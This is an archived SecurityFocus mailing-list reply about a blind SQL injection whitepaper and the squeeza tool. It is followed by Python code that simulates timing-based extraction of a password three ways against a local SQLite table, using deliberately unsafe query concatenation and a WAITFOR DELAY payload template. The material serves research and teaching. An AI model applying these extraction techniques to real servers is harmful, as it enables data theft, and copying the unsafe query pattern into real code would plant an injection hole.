Web Application Security
Deep Blind SQL Injection Whitepaper Aug 19 2008 01:38PM
Ferruh Mavituna (ferruh mavituna com) (1 replies)
Re: Deep Blind SQL Injection Whitepaper Aug 21 2008 08:31PM
Haroon Meer (haroon sensepost com)
Hey guys..

* On 19/08/2008, [at 14:38:55 +0100] Ferruh Mavituna [ferruh (at) mavituna (dot) com] seemed to say:
>This is a short whitepaper about a new way to exploit Blind SQL
>Injections. It's implemented in BSQL Hacker (
>http://labs.portcullis.co.uk/application/bsql-hacker/ ).
>
>It is possible to gather information from a target server with a 66%
>reduction in the number of requests made of the server (compared to
>normal Blind SQL Injection), requiring two rather than six requests to
>retrieve each char.

if you like, you can also check out squeeza
[http://www.sensepost.com/research/squeeza/] and its associated
whitepaper
[http://www.sensepost.com/research/squeeza/dc-15-meer_and_slaviero-WP.pdf]

squeeza allowed sql injection attacks to extract info via
DNS/Timing/Error Messages also, but its timing method extracted data one
bit at a time with retransmits / state control, effectively allowing for
full binary-safe data transfer from the injectable .db

squeeza is written in ruby, and not as pretty as bsql-hacker, but in its
defense _did_ have an ascii art logo..

/mh
--
Haroon Meer, SensePost Information Security |
http://www.sensepost.com/blog/
PGP: http://www.sensepost.com/pgp/haroon.txt | Tel: +27 83786 6637
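The two timing approaches the thread compares (one bit per request, as in squeeza's timing channel, versus encoding several bits in the length of the delay so that two requests recover a character, as the Deep Blind whitepaper describes) can be put side by side in a small simulation. The code below is an added illustration written for this page and is not code from BSQL Hacker, squeeza, or either author. It assumes an in-memory SQLite table with a constructed secret, and it simulates the timing channel: instead of sleeping, the oracle reports how many time units a `WAITFOR DELAY`-style payload would have slept. The classic baseline here is a 0..127 binary search at seven requests per character; the whitepaper's own baseline of six requests per character presumably reflects a different charset, so the counts are illustrative rather than a reproduction of the paper's figures.

```python
"""Simulated timing-based blind SQL injection, three ways.

Added illustration, not code from BSQL Hacker or squeeza. Target is an
in-memory SQLite table with a constructed secret. The delay channel is
simulated: the oracle evaluates the injected expression and returns the
number of time units the server *would* have slept.
"""
import sqlite3

SECRET = "s3cr3t!"  # constructed sample data, 7 ASCII characters

# SQLite expression for the code point of character i of the password.
# On SQL Server the equivalent would be ASCII(SUBSTRING(password, i, 1)).
CHAR_AT = "unicode(substr(password, %d, 1))"


class SimulatedTimingOracle:
    """Stands in for an endpoint with a time-based blind SQL injection.

    A real target would run something like
        WAITFOR DELAY '0:0:' + CAST((<expr>) AS varchar)   -- MSSQL
    and the attacker would measure the response time. Here the server
    evaluates <expr> against the real table and reports the delay units.
    """

    def __init__(self, secret):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE users(name TEXT, password TEXT)")
        self.db.execute("INSERT INTO users VALUES ('admin', ?)", (secret,))
        self.requests = 0  # one increment per simulated HTTP request

    def delay_for(self, expr):
        """Inject `expr` into the vulnerable query; return observed delay units."""
        self.requests += 1
        # Deliberately unsafe string concatenation, as on the vulnerable server.
        sql = "SELECT (%s) FROM users WHERE name = 'admin'" % expr
        (units,) = self.db.execute(sql).fetchone()
        return int(units)


def extract_bit_at_a_time(oracle, length):
    """squeeza-style timing: one bit per request, 8 requests per character.

    Each request sleeps 1 unit if the selected bit is set, else 0.
    """
    out = []
    for i in range(1, length + 1):
        code = 0
        for bit in range(8):
            code |= oracle.delay_for("(%s >> %d) & 1" % (CHAR_AT % i, bit)) << bit
        out.append(chr(code))
    return "".join(out)


def extract_binary_search(oracle, length, lo=0, hi=127):
    """Classic blind extraction: compare against midpoints, 7 requests per
    7-bit ASCII character. SQLite evaluates `x > mid` to 0 or 1, which the
    simulated server turns into a 0- or 1-unit delay.
    """
    out = []
    for i in range(1, length + 1):
        a, b = lo, hi
        while a < b:
            mid = (a + b) // 2
            if oracle.delay_for("%s > %d" % (CHAR_AT % i, mid)):
                a = mid + 1
            else:
                b = mid
        out.append(chr(a))
    return "".join(out)


def extract_nibble_at_a_time(oracle, length):
    """Deep-blind style: encode 4 bits in the *length* of the delay (0..15
    units), so two requests recover each 8-bit character. The cost is that
    the attacker must reliably distinguish 16 delay lengths instead of 2.
    """
    out = []
    for i in range(1, length + 1):
        high = oracle.delay_for("(%s >> 4) & 15" % (CHAR_AT % i))
        low = oracle.delay_for("%s & 15" % (CHAR_AT % i))
        out.append(chr((high << 4) | low))
    return "".join(out)


def compare_methods(secret=SECRET):
    """Run all three extractors against fresh oracles; return
    {method: (recovered_string, request_count)}. The secret length is
    assumed known, as it would be after a separate LENGTH() extraction."""
    results = {}
    for name, fn in (("bit_at_a_time", extract_bit_at_a_time),
                     ("binary_search", extract_binary_search),
                     ("nibble_at_a_time", extract_nibble_at_a_time)):
        oracle = SimulatedTimingOracle(secret)
        results[name] = (fn(oracle, len(secret)), oracle.requests)
    return results


if __name__ == "__main__":
    for name, (recovered, n) in compare_methods().items():
        print("%-17s %-10r %d requests" % (name, recovered, n))
```

For the 7-character constructed secret the bit-at-a-time extractor issues 56 requests, the binary search 49, and the nibble-per-request extractor 14. The request count is not the whole story on a real network: a 16-level delay channel needs delay steps wide enough to survive jitter, so each of those 14 requests takes longer and a single mis-measured delay corrupts four bits at once, whereas a one-bit channel tolerates noise better and, as the squeeza reply notes, can add retransmits and state control on top. Which trade-off wins depends on latency variance and how tightly the target is rate-limited.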

Copyright 2010, SecurityFocus